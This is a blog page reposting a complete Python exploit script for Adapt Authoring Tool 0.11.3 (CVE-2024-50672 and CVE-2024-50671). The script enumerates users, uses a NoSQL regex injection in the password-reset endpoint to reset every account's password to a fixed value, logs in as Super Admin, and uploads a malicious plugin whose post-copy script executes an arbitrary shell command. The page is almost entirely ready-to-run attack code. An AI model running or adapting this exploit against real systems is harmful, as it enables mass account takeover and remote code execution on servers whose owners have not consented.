Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86383860

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
# Date: 2024-11-24
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.adaptlearning.org/
# Software Link: https://github.com/adaptlearning/adapt_authoring
# Version: 0.11.3
# CVE Identifier: CVE-2024-50672 , CVE-2024-50671

import io
import sys
import json
import zipfile
import argparse
import requests
import textwrap


def get_session_cookie(username, password):
    data = {"email": username, "password": password}
    res = requests.post(f"{args.url}/api/login", data=data)

    if res.status_code == 200:
        print(f"[+] Login as {username}")
        return res.cookies.get_dict()

    return None


def get_users():
    session_cookie = get_session_cookie(args.username, args.password)
    if session_cookie is None:
        print("[-] Login failed")
        sys.exit()

    res = requests.get(f"{args.url}/api/user", cookies=session_cookie)
    users = [
        {"email": user["email"], "role": user["roles"][0]["name"]}
        for user in json.loads(res.text)
    ]

    roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3}
    users.sort(key=lambda user: roles[user["role"]])
    for user in users:
        print(f"[+] {user['email']} ({user['role']})")

    return users


def reset_password(users):
    # Overwrite potentially expired password reset tokens
    for user in users:
        data = {"email": user["email"]}
        requests.post(f"{args.url}/api/createtoken", data=data)
    print("[+] Generate password reset token for every user")

    valid_characters = "0123456789abcdef"
    next_tokens = ["^"]

    # Ensure that only a single result is returned at a time
    while next_tokens:
        prev_tokens = next_tokens
        next_tokens = []

        for token in prev_tokens:
            for ch in valid_characters:
                data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"}
                res = requests.put(
                    f"{args.url}/api/userpasswordreset/w00tw00t",
                    json=data,
                )

                # Multiple results returned
                if res.status_code == 500:
                    next_tokens.append(token + ch)

    print("[+] Reset every password to HaXX0r3d!")


def create_plugin(plugin_name):
    manifest = {
        "name": plugin_name,
        "version": "1.0.0",
        "extension": "exploit",
        "main": "/js/main.js",
        "displayName": "exploit",
        "keywords": ["adapt-plugin", "adapt-extension"],
        "scripts": {"adaptpostcopy": "/scripts/postcopy.js"},
    }

    property = {
        "properties": {
            "pluginLocations": {
                "type": "object",
                "properties": {"course": {"type": "object"}},
            }
        }
    }

    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    module.exports = async function (fs, path, log, options, done) {{
      try {{
        exec("{args.command}");
      }} catch (err) {{
        log(err);
      }}
      done();
    }};
    """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/bower.json",
            io.BytesIO(json.dumps(manifest).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/properties.schema",
            io.BytesIO(json.dumps(property).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/scripts/postcopy.js",
            io.BytesIO(payload.encode()).getvalue(),
        )

    plugin.seek(0)
    return plugin


def find_plugin(cookies, plugin_type, plugin_name):
    res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies)
    for plugin in json.loads(res.text):
        if plugin["name"] == plugin_name:
            return plugin["_id"]

    return None


def create_course(cookies):
    data = {}
    res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data)
    course_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": course_id}
    res = requests.post(
        f"{args.url}/api/content/contentobject",
        cookies=cookies,
        json=data,
    )
    content_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": content_id}
    res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data)
    article_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": article_id}
    res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data)
    block_id = json.loads(res.text)["_id"]

    component_id = find_plugin(cookies, "component", "adapt-contrib-text")

    data = {
        "_courseId": course_id,
        "_parentId": block_id,
        "_component": "text",
        "_componentType": component_id,
    }
    requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data)

    return course_id


def rce(users):
    session_cookie = None
    for user in users:
        if user["role"] == "Super Admin":
            session_cookie = get_session_cookie(user["email"], "HaXX0r3d!")
            break

    if session_cookie is None:
        print("[-] Failed to login as Super Account")
        sys.exit()

    plugin_name = "adapt-contrib-xapi"
    print(f"[+] Create malicious plugin : {plugin_name}")
    plugin = create_plugin(plugin_name)

    print("[+] Scan installed plugins")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[+] {plugin_name} not found")
    else:
        print(f"[+] Found {plugin_name}")
        print(f"[+] Remove {plugin_name}")
        requests.delete(
            f"{args.url}/api/extensiontype/{plugin_id}",
            cookies=session_cookie,
        )

    print("[+] Upload plugin")
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(
        f"{args.url}/api/upload/contentplugin",
        cookies=session_cookie,
        files=files,
    )

    print("[+] Find uploaded plugin")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[-] {plugin_name} not found")
        sys.exit()
    print(f"[+] Plugin ID : {plugin_id}")

    print("[+] Add plugin to new courses")
    data = {"_isAddedByDefault": True}
    requests.put(
        f"{args.url}/api/extensiontype/{plugin_id}",
        cookies=session_cookie,
        json=data,
    )

    print("[+] Create a new course")
    course_id = create_course(session_cookie)

    print("[+] Build course")
    res = requests.get(
        f"{args.url}/api/output/adapt/preview/{course_id}",
        cookies=session_cookie,
    )

    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")

    print("[+] Remove course")
    requests.delete(
        f"{args.url}/api/content/course/{course_id}",
        cookies=session_cookie,
    )


def main():
    print("[*] Retrieve user information")
    users = get_users()

    print("\n[*] Reset password")
    reset_password(users)

    print("\n[*] Perform remote code execution")
    rce(users)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g.  www.adaptlearning.org)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-U",
        dest="username",
        help="Username to authenticate as",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-P",
        dest="password",
        help="Password for the specified username",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()